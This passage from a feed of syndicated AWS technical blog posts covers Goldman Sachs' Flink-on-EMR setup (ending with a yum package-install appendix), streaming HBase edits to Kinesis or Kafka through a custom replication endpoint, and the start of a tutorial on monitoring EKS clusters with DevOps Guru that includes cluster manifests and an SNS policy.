During GIR’s initial production rollout, GIR experienced an issue where their EMR cluster failed silently and caused their Lambda functions to time out. On further debugging, GIR found this issue to be related to an Akka quarantine-after-silence timeout setting. By default, it was set to 48 hours, causing the clusters to refuse more jobs after that time. GIR found a workaround by setting the value of akka.jvm-exit-on-fatal-error to false in the Flink config file.

Conclusion

In this post, we discussed how the GIR team at Goldman Sachs set up a system using Apache Flink on Amazon EMR to carry out the tagging of users with various personas, in order to better curate content offerings for those users. We also covered some of the challenges that GIR faced with the setup of their EMR cluster. This represents an important first step in providing GIR’s users with complete personalized content curation based on their individual profiles and readership.

Acknowledgments

The authors would like to thank the following members of the AWS and GIR teams for their close collaboration and guidance on this post:

  • Elizabeth Byrnes, Managing Director, GIR
  • Moon Wang, Managing Director, GIR
  • Ankur Gurha, Vice President, GIR
  • Jeremiah O’Connor, Solutions Architect, AWS
  • Ley Nezifort, Associate, GIR
  • Shruthi Venkatraman, Analyst, GIR

About the Authors

Balasubramanian Sakthivel is a Vice President at Goldman Sachs in New York. He has more than 16 years of technology leadership experience and worked on many firmwide entitlement, authentication and personalization projects. Bala drives the Global Investment Research division’s client access and data engineering strategy, including architecture, design and practices to enable the lines of business to make informed decisions and drive value. He is an innovator as well as an expert in developing and delivering large scale distributed software that solves real world problems, with demonstrated success envisioning and implementing a broad range of highly scalable platforms, products and architecture.

Victor Gan is an Analyst at Goldman Sachs in New York. Victor joined the Global Investment Research division in 2020 after graduating from Cornell University, and has been responsible for developing and provisioning cloud infrastructure for GIR’s user entitlement systems. He is focused on learning new technologies and streamlining cloud systems deployments.

Manjula Nagineni is a Solutions Architect with AWS based in New York. She works with major Financial service institutions, architecting, and modernizing their large-scale applications while adopting AWS cloud services. She is passionate about designing big data workloads cloud-natively. She has over 20 years of IT experience in Software Development, Analytics and Architecture across multiple domains such as finance, manufacturing and telecom.

 
 


Appendix

GIR ran the following command to install the missing AMI packages:

yum install -y libevent.x86_64 python2-botocore.noarch \

device-mapper-event-libs.x86_64 bind-license.noarch libwebp.x86_64 \

sgpio.x86_64 rsync.x86_64 perl-podlators.noarch libbasicobjects.x86_64 \

langtable.noarch sssd-client.x86_64 perl-Time-Local.noarch dosfstools.x86_64 \

attr.x86_64 perl-macros.x86_64 hwdata.x86_64 gpm-libs.x86_64 libtirpc.x86_64 \

device-mapper-persistent-data.x86_64 libconfig.x86_64 setserial.x86_64 \

rdate.x86_64 bc.x86_64 amazon-ssm-agent.x86_64 virt-what.x86_64 zip.x86_64 \

lvm2-libs.x86_64 python2-futures.noarch perl-threads.x86_64 \

dmraid-events.x86_64 bridge-utils.x86_64 mdadm.x86_64 ec2-net-utils.noarch \

kbd.x86_64 libtiff.x86_64 perl-File-Path.noarch quota-nls.noarch \

libstoragemgmt-python.noarch man-pages-overrides.x86_64 python2-rsa.noarch \

perl-Pod-Usage.noarch psacct.x86_64 libnl3-cli.x86_64 \

libstoragemgmt-python-clibs.x86_64 tcp_wrappers.x86_64 yum-utils.noarch \

libaio.x86_64 mtr.x86_64 teamd.x86_64 hibagent.noarch perl-PathTools.x86_64 \

libxml2-python.x86_64 dmraid.x86_64 pm-utils.x86_64 \

amazon-linux-extras-yum-plugin.noarch strace.x86_64 bzip2.x86_64 \

perl-libs.x86_64 kbd-legacy.noarch perl-Storable.x86_64 perl-parent.noarch \

bind-utils.x86_64 libverto-libevent.x86_64 ntsysv.x86_64 yum-langpacks.noarch \

libjpeg-turbo.x86_64 plymouth-core-libs.x86_64 perl-threads-shared.x86_64 \

kernel-tools.x86_64 bind-libs-lite.x86_64 screen.x86_64 \

perl-Text-ParseWords.noarch perl-Encode.x86_64 libcollection.x86_64 \

xfsdump.x86_64 perl-Getopt-Long.noarch man-pages.noarch pciutils.x86_64 \

python2-s3transfer.noarch plymouth-scripts.x86_64 device-mapper-event.x86_64 \

json-c.x86_64 pciutils-libs.x86_64 perl-Exporter.noarch libdwarf.x86_64 \

libpath_utils.x86_64 perl.x86_64 libpciaccess.x86_64 hunspell-en-US.noarch \

nfs-utils.x86_64 tcsh.x86_64 libdrm.x86_64 awscli.noarch cryptsetup.x86_64 \

python-colorama.noarch ec2-hibinit-agent.noarch usermode.x86_64 rpcbind.x86_64 \

perl-File-Temp.noarch libnl3.x86_64 generic-logos.noarch python-kitchen.noarch \

words.noarch kbd-misc.noarch python-docutils.noarch hunspell-en.noarch \

dyninst.x86_64 perl-Filter.x86_64 libnfsidmap.x86_64 kpatch-runtime.noarch \

python-simplejson.x86_64 time.x86_64 perl-Pod-Escapes.noarch \

perl-Pod-Perldoc.noarch langtable-data.noarch vim-enhanced.x86_64 \

bind-libs.x86_64 boost-system.x86_64 jbigkit-libs.x86_64 binutils.x86_64 \

wget.x86_64 libdaemon.x86_64 ed.x86_64 at.x86_64 libref_array.x86_64 \

libstoragemgmt.x86_64 libteam.x86_64 hunspell.x86_64 python-daemon.noarch \

dmidecode.x86_64 perl-Time-HiRes.x86_64 blktrace.x86_64 bash-completion.noarch \

lvm2.x86_64 mlocate.x86_64 aws-cfn-bootstrap.noarch plymouth.x86_64 \

parted.x86_64 tcpdump.x86_64 sysstat.x86_64 vim-filesystem.noarch \

lm_sensors-libs.x86_64 hunspell-en-GB.noarch cyrus-sasl-plain.x86_64 \

perl-constant.noarch libini_config.x86_64 python-lockfile.noarch \

perl-Socket.x86_64 nano.x86_64 setuptool.x86_64 traceroute.x86_64 \

unzip.x86_64 perl-Pod-Simple.noarch langtable-python.noarch jansson.x86_64 \

pystache.noarch keyutils.x86_64 acpid.x86_64 perl-Carp.noarch GeoIP.x86_64 \

python2-dateutil.noarch systemtap-runtime.x86_64 scl-utils.x86_64 \

python2-jmespath.noarch quota.x86_64 perl-HTTP-Tiny.noarch ec2-instance-connect.noarch \

vim-common.x86_64 libsss_idmap.x86_64 libsss_nss_idmap.x86_64 \

perl-Scalar-List-Utils.x86_64 gssproxy.x86_64 lsof.x86_64 ethtool.x86_64 \

boost-date-time.x86_64 python-pillow.x86_64 boost-thread.x86_64 yajl.x86_64

Stream Apache HBase edits for real-time analytics

Post Syndicated from Amir Shenavandeh original https://aws.amazon.com/blogs/big-data/stream-apache-hbase-edits-for-real-time-analytics/

Apache HBase is a non-relational database. To use the data, applications need to query the database to pull the data and changes from tables. In this post, we introduce a mechanism to stream Apache HBase edits into streaming services such as Apache Kafka or Amazon Kinesis Data Streams. In this approach, changes to data are pushed and queued into a streaming platform such as Kafka or Kinesis Data Streams for real-time processing, using a custom Apache HBase replication endpoint.

We start with a brief technical background on HBase replication and review a use case in which we store IoT sensor data into an HBase table and enrich rows using periodic batch jobs. We demonstrate how this solution enables you to enrich the records in real time and in a serverless way using AWS Lambda functions.

Common scenarios and use cases of this solution are as follows:

  • Auditing data, triggers, and anomaly detection using Lambda
  • Shipping WALEdits via Kinesis Data Streams to Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) to index records asynchronously
  • Triggers on Apache HBase bulk loads
  • Processing streamed data using Apache Spark Streaming, Apache Flink, Amazon Kinesis Data Analytics, or Kinesis analytics
  • HBase edits or change data capture (CDC) replication into other storage platforms, such as Amazon Simple Storage Service (Amazon S3), Amazon Relational Database Service (Amazon RDS), and Amazon DynamoDB
  • Incremental HBase migration by replaying the edits from any point in time, based on configured retention in Kafka or Kinesis Data Streams

This post progresses into some common use cases you might encounter, along with their design options and solutions. We review and expand on these scenarios in separate sections, in addition to the considerations and limits in our application designs.

Introduction to HBase replication

At a very high level, the principle of HBase replication is based on replaying transactions from a source cluster to the destination cluster. This is done by replaying WALEdits or Write Ahead Log entries on the RegionServers of the source cluster into the destination cluster. To explain WALEdits, in HBase, all the mutations in data like PUT or DELETE are written to MemStore of their specific region and are appended to a WAL file as WALEdits or entries. Each WALEdit represents a transaction and can carry multiple write operations on a row. Because the MemStore is an in-memory entity, in case a region server fails, the lost data can be replayed and restored from the WAL files. Having a WAL is optional, and some operations may not require WALs or can request to bypass WALs for quicker writes. For example, records in a bulk load aren’t recorded in WAL.

HBase replication is based on transferring WALEdits to the destination cluster and replaying them so any operation that bypasses WAL isn’t replicated.

When setting up a replication in HBase, a ReplicationEndpoint implementation needs to be selected in the replication configuration when creating a peer, and on every RegionServer, an instance of ReplicationEndpoint runs as a thread. In HBase, a replication endpoint is pluggable for more flexibility in replication and shipping WALEdits to different versions of HBase. You can also use this to build replication endpoints for sending edits to different platforms and environments. For more information about setting up replication, see Cluster Replication.

HBase bulk load replication HBASE-13153

In HBase, bulk loading is a method to directly import HFiles or Store files into RegionServers. This avoids the normal write path and WALEdits. As a result, far less CPU and network resources are used when importing big portions of data into HBase tables.

You can also use HBase bulk loads to recover data when an error or outage causes the cluster to lose track of regions and Store files.

Because bulk loads skip WAL creation, all new records aren’t replicated to the secondary cluster. In HBASE-13153, which is an enhancement, a bulk load is represented as a bulk load event, carrying the location of the imported files. You can activate this by setting hbase.replication.bulkload.enabled to true and setting hbase.replication.cluster.id to a unique value as a prerequisite.

Custom streaming replication endpoint

We can use HBase’s pluggable endpoints to stream records into platforms such as Kinesis Data Streams or Kafka. Transferred records can be consumed by Lambda functions, processed by a Spark Streaming application or Apache Flink on Amazon EMR, Kinesis Data Analytics, or any other big data platform.

In this post, we demonstrate an implementation of a custom replication endpoint that allows replicating WALEdits in Kinesis Data Streams or Kafka topics.

In our example, we built upon the BaseReplicationEndpoint abstract class, inheriting the ReplicationEndpoint interface.

The main method to implement and override is the replicate method. This method replicates a set of items it receives every time it’s called and blocks until all those records are replicated to the destination.

For our implementation and configuration options, see our GitHub repository.

Use case: Enrich records in real time

We now use the custom streaming replication endpoint implementation to stream HBase edits to Kinesis Data Streams.

The provided AWS CloudFormation template demonstrates how we can set up an EMR cluster with replication to either Kinesis Data Streams or Apache Kafka and consume the replicated records, using a Lambda function to enrich data asynchronously, in real time. In our sample project, we launch an EMR cluster with an HBase database. A sample IoT traffic generator application runs as a step in the cluster and puts records, containing a registration number and an instantaneous speed, into a local HBase table. Records are replicated in real time into a Kinesis stream or Kafka topic based on the selected option at launch, using our custom HBase replication endpoint. When the step starts putting the records into the stream, a Lambda function is provisioned and starts digesting records from the beginning of the stream and catches up with the stream. The function calculates a score per record, based on a formula on variation from minimum and maximum speed limits in the use case, and persists the result as a score qualifier into a different column family, out of replication scope in the source table, by running HBase puts on RowKey.

The following diagram illustrates this architecture.

To launch our sample environment, you can use our template on GitHub.

The template creates a VPC, public and private subnets, Lambda functions to consume records and prepare the environment, an EMR cluster with HBase, and a Kinesis data stream or an Amazon Managed Streaming for Apache Kafka (Amazon MSK) cluster depending on the selected parameters when launching the stack.

Architectural design patterns

Traditionally, Apache HBase tables are considered as data stores, where consumers get or scan the records from tables. It’s very common in modern databases to react to database logs or CDC for real-time use cases and triggers. With our streaming HBase replication endpoint, we can project table changes into message delivery systems like Kinesis Data Streams or Apache Kafka.

We can trigger Lambda functions to consume messages and records from Apache Kafka or Kinesis Data Streams to consume the records in a serverless design or the wider Amazon Kinesis ecosystems such as Kinesis Data Analytics or Amazon Kinesis Data Firehose for delivery into Amazon S3. You could also pipe in Amazon OpenSearch Service.

A wide range of consumer ecosystems, such as Apache Spark, AWS Glue, and Apache Flink, is available to consume from Kafka and Kinesis Data Streams.

Let’s review few other common use cases.

Index HBase rows

Apache HBase rows are retrievable by RowKey. Writing a row into HBase with the same RowKey overwrites or creates a new version of the row. To retrieve a row, it needs to be fetched by the RowKey or a range of rows needs to be scanned if the RowKey is unknown.

In some use cases, scanning the table for a specific qualifier or value is expensive if we index our rows in another parallel system like Elasticsearch asynchronously. Applications can use the index to find the RowKey. Without this solution, a periodic job has to scan the table and write them into an indexing service like Elasticsearch to hydrate the index, or the producing application has to write in both HBase and Elasticsearch directly, which adds overhead to the producer.

Enrich and audit data

A very common use case for HBase streaming endpoints is enriching data and storing the enriched records in a data store, such as Amazon S3 or RDS databases. In this scenario, a custom HBase replication endpoint streams the records into a message distribution system such as Apache Kafka or Kinesis Data Streams. Records can be serialized, using the AWS Glue Schema Registry for schema validation. A consumer on the other end of the stream reads the records, enriches them, and validates against a machine learning model in Amazon SageMaker for anomaly detection. The consumer persists the records in Amazon S3 and potentially triggers an alert using Amazon Simple Notification Service (Amazon SNS). Stored data on Amazon S3 can be further digested on Amazon EMR, or we can create a dashboard on Amazon QuickSight, interfacing Amazon Athena for queries.

The following diagram illustrates our architecture.

Store and archive data lineage

Apache HBase comes with the snapshot feature. You can freeze the state of tables into snapshots and export them to any distributed file system like HDFS or Amazon S3. Recovering snapshots restores the entire table to the snapshot point.

Apache HBase also supports versioning at the row level. You can configure column families to keep row versions, and the default versioning is based on timestamps.

However, when using this approach to stream records into Kafka or Kinesis Data Streams, records are retained inside the stream, and you can partially replay a period. Recovering snapshots only recovers up to the snapshot point and the future records aren’t present.

In Kinesis Data Streams, by default records of a stream are accessible for up to 24 hours from the time they are added to the stream. This limit can be increased to up to 7 days by enabling extended data retention, or up to 365 days by enabling long-term data retention. See Quotas and Limits for more information.

In Apache Kafka, record retention has virtually no limits based on available resources and disk space configured on the Kafka cluster, and can be configured by setting log.retention.

Trigger on HBase bulk load

The HBase bulk load feature uses a MapReduce job to output table data in HBase’s internal data format, and then directly loads the generated Store files into the running cluster. Using bulk load uses less CPU and network resources than loading via the HBase API, as HBase bulk load bypasses WALs in the write path and the records aren’t seen by replication. However, since HBASE-13153, you can configure HBase to replicate a meta record as an indication of a bulk load event.

A Lambda function processing replicated WALEdits can listen to this event to trigger actions, such as automatically refreshing a read replica HBase cluster on Amazon S3 whenever a bulk load happens. The following diagram illustrates this workflow.

Considerations for replication into Kinesis Data Streams

Kinesis Data Streams is a massively scalable and durable real-time data streaming service. Kinesis Data Streams can continuously capture gigabytes of data per second from hundreds of thousands of sources with very low latency. Kinesis is fully managed and runs your streaming applications without requiring you to manage any infrastructure. It’s durable, because records are synchronously replicated across three Availability Zones, and you can increase data retention to 365 days.

When considering Kinesis Data Streams for any solution, it’s important to consider service limits. For instance, as of this writing, the maximum size of the data payload of a record before base64-encoding is up to 1 MB, so we must make sure the records or serialized WALEdits remain within the Kinesis record size limit. To be more efficient, you can enable the hbase.replication.compression-enabled attribute to GZIP compress the records before sending them to the configured stream sink.

Kinesis Data Streams retains the order of the records within the shards as they arrive, and records can be read or processed in the same order. However, in this sample custom replication endpoint, a random partition key is used so that the records are evenly distributed between the shards. We can also use a hash function to generate a partition key when putting records into the stream, for example based on the Region ID so that all the WALEdits from the same Region land in the same shard and consumers can assume Region locality per shards.

For delivering records in KinesisSinkImplemetation, we use the Amazon Kinesis Producer Library (KPL) to put records into Kinesis data streams. The KPL simplifies producer application development; we can achieve high write throughput to a Kinesis data stream. We can use the KPL in either synchronous or asynchronous use cases. We suggest using the higher performance of the asynchronous interface unless there is a specific reason to use synchronous behavior. KPL is very configurable and has retry logic built in. You can also perform record aggregation for maximum throughput. In KinesisSinkImplemetation, by default records are asynchronously replicated to the stream. We can change to synchronous mode by setting hbase.replication.kinesis.syncputs to true. We can enable record aggregation by setting hbase.replication.kinesis.aggregation-enabled to true.

The KPL can incur an additional processing delay because it buffers records before sending them to the stream based on a user-configurable attribute of RecordMaxBufferedTime. Larger values of RecordMaxBufferedTime results in higher packing efficiencies and better performance. However, applications that can’t tolerate this additional delay may need to use the AWS SDK directly.

Kinesis Data Streams and the Kinesis family are fully managed and easily integrate with the rest of the AWS ecosystem with minimum development effort with services such as the AWS Glue Schema Registry and Lambda. We recommend considering Kinesis Data Streams for low-latency, real-time use cases on AWS.

Considerations for replication into Apache Kafka

Apache Kafka is a high-throughput, scalable, and highly available open-source distributed event streaming platform used by thousands of companies for high-performance data pipelines, streaming analytics, data integration, and mission-critical applications.

AWS offers Amazon MSK as a fully managed Kafka service. Amazon MSK provides the control plane operations and runs open-source versions of Apache Kafka. Existing applications, tooling, and plugins from partners and the Apache Kafka community are supported without requiring changes to application code.

You can configure this sample project for Apache Kafka brokers directly or just point towards an Amazon MSK ARN for replication.

Although there is virtually no limit on the size of the messages in Kafka, the default maximum message size is set to 1 MB by default, so we must make sure the records, or serialized WALEdits, remain within the maximum message size for topics.

The Kafka producer tries to batch records together whenever possible to limit the number of requests for more efficiency. This is configurable by setting batch.size, linger.ms, and delivery.timeout.ms.

In Kafka, topics are partitioned, and partitions are distributed between different Kafka brokers. This distributed placement allows for load balancing of consumers and producers. When a new event is published to a topic, it’s appended to one of the topic’s partitions. Events with the same event key are written to the same partition, and Kafka guarantees that any consumer of a given topic partition can always read that partition’s events in exactly the same order as they were written. KafkaSinkImplementation uses a random partition key to distribute the messages evenly between the partitions. This could be based on a heuristic function, for example based on Region ID, if the order of the WALEdits or record locality is important by the consumers.

Semantic guarantees

Like any streaming application, it’s important to consider semantic guarantee from the producer of messages, to acknowledge or fail the status of delivery of messages in the message queue and checkpointing on the consumer’s side. Based on our use cases, we need to consider the following:

  • At most once delivery – Messages are never delivered more than once, and there is a chance of losing messages
  • At least once delivery – Messages can be delivered more than once, with no loss of messages
  • Exactly once delivery – Every message is delivered only once, and there is no loss of messages

After changes are persisted as WALs and in MemStore, the replicate method in ReplicationEnpoint is called to replicate a collection of WAL entries and returns a Boolean (true/false) value. If the returned value is true, the entries are considered successfully replicated by HBase and the replicate method is called for the next batch of WAL entries. Depending on configuration, both KPL and Kafka producers might buffer the records for longer if configured for asynchronous writes. Failures can cause loss of entries, retries, and duplicate delivery of records to the stream, which could be determinantal for synchronous or asynchronous message delivery.

If our operations aren’t idempotent, you can checkpoint or check for unique sequence numbers on the consumer side. For a simple HBase record replication, RowKey operations are idempotent and they carry a timestamp and sequence ID.

Summary

Replication of HBase WALEdits into streams is a powerful tool that you can use in multiple use cases and in combination with other AWS services. You can create practical solutions to further process records in real time, audit the data, detect anomalies, set triggers on ingested data, or archive data in streams to be replayed on other HBase databases or storage services from a point in time. This post outlined some common use cases and solutions, along with some best practices when implementing your custom HBase streaming replication endpoints.

Review, clone, and try our HBase replication endpoint implementation from our GitHub repository and launch our sample CloudFormation template.

We like to learn about your use cases. If you have questions or suggestions, please leave a comment.


About the Authors

Amir Shenavandeh is a Senior Hadoop systems engineer and Amazon EMR subject matter expert at Amazon Web Services. He helps customers with architectural guidance and optimization. He leverages his experience to help people bring their ideas to life, focusing on distributed processing and big data architectures.

Maryam Tavakoli is a Cloud Engineer and Amazon OpenSearch subject matter expert at Amazon Web Services. She helps customers with their Analytics and Streaming workload optimization and is passionate about solving complex problems with simplistic user experience that can empower customers to be more productive.

Automate Container Anomaly Monitoring of Amazon Elastic Kubernetes Service Clusters with Amazon DevOps Guru

Post Syndicated from Rahul Sharad Gaikwad original https://aws.amazon.com/blogs/devops/automate-container-anomaly-monitoring-of-amazon-elastic-kubernetes-service-clusters-with-amazon-devops-guru/

Observability in a container-centric environment presents new challenges for operators due to the increasing number of abstractions and supporting infrastructure. In many cases, organizations can have hundreds of clusters and thousands of services/tasks/pods running concurrently. This post will demonstrate new features in Amazon DevOps Guru to help simplify and expand the capabilities of the operator. The features include grouping anomalies by metric and container cluster to improve context and simplify access and support for additional Amazon CloudWatch Container Insight metrics. An example of these capabilities in action would be that Amazon DevOps Guru can now identify anomalies in CPU, memory, or networking within Amazon Elastic Kubernetes Service (EKS), notifying the operators and letting them more easily navigate to the affected cluster to examine the collected data.

Amazon DevOps Guru offers a fully managed AIOps platform service that lets developers and operators improve application availability and resolve operational issues faster. It minimizes manual effort by leveraging machine learning (ML) powered recommendations. Its ML models take advantage of the expertise of AWS in operating highly available applications for the world’s largest ecommerce business for over 20 years. DevOps Guru automatically detects operational issues, predicts impending resource exhaustion, details likely causes, and recommends remediation actions.

Solution Overview

In this post, we will demonstrate the new Amazon DevOps Guru features around cluster grouping and additionally supported Amazon EKS metrics. To demonstrate these features, we will show you how to create a Kubernetes cluster, instrument the cluster using AWS Distro for OpenTelemetry, and then configure Amazon DevOps Guru to automate anomaly detection of EKS metrics. A previous blog provides detail on the AWS Distro for OpenTelemetry collector that is employed here.

Prerequisites

EKS Cluster Creation

We employ the eksctl CLI tool to create an Amazon EKS. Using eksctl, you can provide details on the command line or specify a manifest file. The following manifest is used to create a single managed node using Amazon Elastic Compute Cloud (EC2), and this will be created and constrained to the specified Region via entry metadata/region and Availability Zones via the managedNodeGroups/availabilityZones entry. By default, this will create a new VPC with eight subnets.

# An example of ClusterConfig object using Managed Nodes
---
    apiVersion: eksctl.io/v1alpha5
    kind: ClusterConfig

    metadata:
      name: devopsguru-eks-cluster
      region: <SPECIFY_REGION_HERE>
      version: "1.21"

    availabilityZones: ["<FIRST_AZ>","<SECOND_AZ>"]
    managedNodeGroups:
      - name: managed-ng-private
        privateNetworking: true
        instanceType: t3.medium
        minSize: 1
        desiredCapacity: 1
        maxSize: 6
        availabilityZones: ["<SPECIFY_AVAILABILITY_ZONE(S)_HERE"]
        volumeSize: 20
        labels: {role: worker}
        tags:
          nodegroup-role: worker
    cloudWatch:
      clusterLogging:
        enableTypes:
          - "api"
  • To create an Amazon EKS cluster using eksctl and a manifest file, we use eksctl create as shown below. Note that this step will take 10 – 15 minutes to establish the cluster.
$ eksctl create cluster -f devopsguru-managed-node.yaml
2021-10-13 10:44:53 [i] eksctl version 0.69.0
…
2021-10-13 11:04:42 [✔] all EKS cluster resources for "devopsguru-eks-cluster" have been created
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:44 [i] waiting for at least 1 node(s) to become ready in "managed-ng-private"
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:47 [i] kubectl command should work with "/Users/<user>/.kube/config"
  • Once this is complete, you can use kubectl, the Kubernetes CLI, to access the managed nodes that are running.
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
<ip>.<region>.compute.internal Ready <none> 76m v1.21.4-eks-033ce7e

AWS Distro for OpenTelemetry Collector Installation

We will use AWS Distro for OpenTelemetry Collector to extract metrics from a pod running in Amazon EKS. This will collect metrics within the Kubernetes cluster and surface them to Amazon CloudWatch. We start by defining a policy to allow access. The following information comes from the post here.

Attach the CloudWatchAgentServerPolicy IAM Policy to worker node

  • Open the Amazon EC2 console.
  • Select one of the worker node instances, and choose the IAM role in the description.
  • On the IAM role page, choose Attach policies.
  • In the list of policies, select the check box next to CloudWatchAgentServerPolicy. You can use the search box to find this policy.
  • Choose Attach policies.

Deploy AWS OpenTelemetry Collector on Amazon EKS

Next, you will deploy the AWS Distro for OpenTelemetry using a GitHub hosted manifest.

  • Deploy the artifact to the Amazon EKS cluster using the following command:
$ curl https://raw.githubusercontent.com/aws-observability/aws-otel-collector/main/deployment-template/eks/otel-container-insights-infra.yaml | kubectl apply -f -
  • View the resources in the aws-otel-eks namespace.
$ kubectl get pods -l name=aws-otel-eks-ci -n aws-otel-eks
NAME READY STATUS RESTARTS AGE
aws-otel-eks-ci-jdf2w 1/1 Running 0 107m

View Container Insight Metrics in Amazon CloudWatch

Access Amazon CloudWatch and select Metrics, All metrics to view the published metrics. Under Custom Namespaces, ContainerInsights is selectable. Under this, one can view metrics at the cluster, node, pod, namespace, and service granularity. The following example shows pod level metrics of CPU:

The AWS Console with Amazon Cloudwatch Container Insights Pod Level CPU Utilization.

Amazon Simple Notification Service

It is necessary to allow Amazon DevOps Guru access to Amazon SNS in order for Amazon SNS to publish events. During the setup process, an Amazon SNS Topic is created, and the following resource policy is applied:

{
    "Sid": "DevOpsGuru-added-SNS-topic-permissions",
    "Effect": "Allow",
    "Principal": {
        "Service": "region-id.devops-guru.amazonaws.com"
    },
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:region-id:topic-owner-account-id:my-topic-name",
    "Condition" : {
      "StringEquals" : {
        "AWS:SourceArn": "arn:aws:devops-guru:region-id:topic-owner-account-id:channel/devops-guru-channel-id",
        "AWS:SourceAccount": "topic-owner-account-id"
    }
  }
}

Amazon DevOps Guru

Amazon DevOps Guru can now be leveraged to monitor the Amazon EKS cluster and Managed Node Group. Select Amazon DevOps Guru, and select Get started as shown in the following figure to do this.

The Amazon DevOps Guru service via the AWS Console.

Once selected, the Get started console displays, letting you specify the IAM role for DevOps guru to access the appropriate resources.

The Get started dialog for Amazon DevOps Guru including instructions on how the service operates, IAM Role Permissions and Amazon DevOps Guru analysis coverage.

Under the Amazon DevOps Guru analysis coverage, Choose later is selected. This will let us specify the CloudFormation stacks to monitor. Select Create a new SNS topic, and provide a name. This will be used to collect notifications and allow for subscribers to then be notified. Select Enable when complete.

The Amazon DevOps Guru analysis coverage allowing the user to select all resources in a region or to choose later. In addition the image shows the dialog that requests the user specify an Amazon SNS topic for notification when insights occur.

On the Manage DevOps Guru analysis coverage, select Analyze all AWS resources in the specified CloudFormation stacks in this Region. Then, select the cluster and managed node group AWS CloudFormation stacks so that DevOps Guru can monitor Amazon EKS.

A dialog where the user is able to specify the AWS CloudFormation stacks in a region for analysis coverage. Two stacks are select including the eks cluster and eks cluster managed node group.

Once this is selected, the display will update indicating that two CloudFormation stacks were added.

Amazon DevOps Guru Settings including DevOps Guru analysis coverage and Amazon SNS notifications.

Amazon DevOps Guru will finally start analysis for those two stacks. This will take several hours to collect data and to identify normal operating conditions. Once this process is complete, the Dashboard will display that those resources have been analyzed, as shown in the following figure.

The completed analysis by DevOps guru of the two AWS Cloudformation stacks indicating a healthy status for both.

Enable Encryption on Amazon SNS Topic

The Amazon SNS Topic created by Amazon DevOps Guru will not enable encryption by default. It is important to enable this feature to encrypt notifications at rest. Go to Amazon SNS, select the topic that is created and then Edit topic. Open the Encryption dialog box and enable encryption as shown in the following figure, specifying an alias, or accepting the default.

The Encryption dialog for Amazon SNS topic when it is Edited.

Deploy Sample Application on Amazon EKS To Trigger Insights

You will employ a sample application that is part of the AWS Distro for OpenTelemetry Collector to simulate failure. Using the following manifest, you will deploy a sample application that has pod resource limits for memory and CPU shares. These limits are artificially low and insufficient for the pod to run. The pod will exceed memory and will be identified for eviction by Amazon EKS. When it is evicted, it will attempt to be redeployed per the manifest requirement for a replica of one. In turn, this will repeat the process and generate memory and pod restart errors in Amazon CloudWatch. For this example, the deployment was left for over an hour, thereby causing the pod failure to repeat numerous times. The following is the manifest that you will create on the filesystem.

kind: Deployment
apiVersion: apps/v1
metadata:
  name: java-sample-app
  namespace: aws-otel-eks
  labels:
    name: java-sample-app
spec:
  replicas: 1
  selector:
    matchLabels:
      name: java-sample-app
  template:
    metadata:
      labels:
        name: java-sample-app
    spec:
      containers:
        - name: aws-otel-emitter
          image: aottestbed/aws-otel-collector-java-sample-app:0.9.0
          resources:
            limits:
              memory: "128Mi"
              cpu: "200m"
          ports:
          - containerPort: 4567
          env:
          - name: OTEL_OTLP_ENDPOINT
            value: "localhost:4317"
          - name: OTEL_RESOURCE_ATTRIBUTES
            value: "service.namespace=AWSObservability,service.name=CloudWatchEKSService"
          - name: S3_REGION
            value: "us-east-1"
          imagePullPolicy: Always

To deploy the application, use the following command:

$ kubectl apply -f <manifest file name>
deployment.apps/java-sample-app created

Scenario: Improved context from DevOps Guru Container Cluster Grouping and Increased Metrics

For our scenario, Amazon DevOps Guru is monitoring additional Amazon CloudWatch Container Insight Metrics for EKS. The following figure shows the flow of information and eventual notification of the operator, so that they can examine the Amazon DevOps Guru Insight. Starting at step 1, the container agent (AWS Distro for OpenTelemetry) forwards container metrics to Amazon CloudWatch. In step 2, Amazon DevOps Guru is continually consuming those metrics and performing anomaly detection. If an anomaly is detected, then this generates an Insight, thereby triggering Amazon SNS notification as shown in step 3. In step 4, the operators access Amazon DevOps Guru console to examine the insight. Then, the operators can leverage the new user interface capability displaying which cluster, namespace, and pod/service is impacted along with correlated Amazon EKS metric(s).

 The flow of information and eventual notification of the operator, so that they can examine the Amazon DevOps Guru Insight. Starting at step 1, the container agent (AWS Distro for OpenTelemetry) forwards container metrics to Amazon CloudWatch. In step 2, Amazon DevOps Guru is continually consuming those metrics and performing anomaly detection. If an anomaly is detected, then this generates an Insight, thereby triggering Amazon SNS notification as shown in step 3. In step 4, the operators access Amazon DevOps Guru console to examine the insight. Then, the operators can leverage the new user interface capability displaying which cluster, namespace, and pod/service is impacted along with correlated Amazon EKS metric(s).

New EKS Container Metrics in DevOps Guru

As part of the release, the following pod and node metrics are now tracked by DevOps Guru:

  • pod_number_of_container_restarts – number of times that a pod is restarted (e.g., image pull issues, container failure).
  • pod_memory_utilization_over_pod_limit – memory that exceeds the pod limit called out in resource memory limits.
  • pod_cpu_utilization_over_pod_limit – CPU shares that exceed the pod limit called out in resource CPU limits.
  • pod_cpu_utilization – percent CPU Utilization within an active pod.
  • pod_memory_utilization – percent memory utilization within an active pod.
  • node_network_total_bytes – total bytes over the network interface for the managed node (e.g., EC2 instance)
  • node_filesystem_utilization – percent file system utilization for the managed node (e.g., EC2 instance).
  • node_cpu_utilization – percent CPU Utilization within a managed node (e.g., EC2 instance).
  • node_memory_utilization – percent memory utilization within a managed node (e.g., EC2 instance).

Operator Scenario

The Kubernetes Operator in the following figure is informed of an insight via Amazon SNS. The Amazon SNS message content appears in the following code, showing the originator and information identifying the InsightDescription, InsightSeverity, name of the container metric, and the Pod / EKS Cluster:

{
 "AccountId": "XXXXXXX",
 "Region": "<REGION>",
 "MessageType": "NEW_INSIGHT",
 "InsightId": "ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
 "InsightUrl": "https://<REGION>.console.aws.amazon.com/devops-guru/#/insight/reactive/ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
 "InsightType": "REACTIVE",
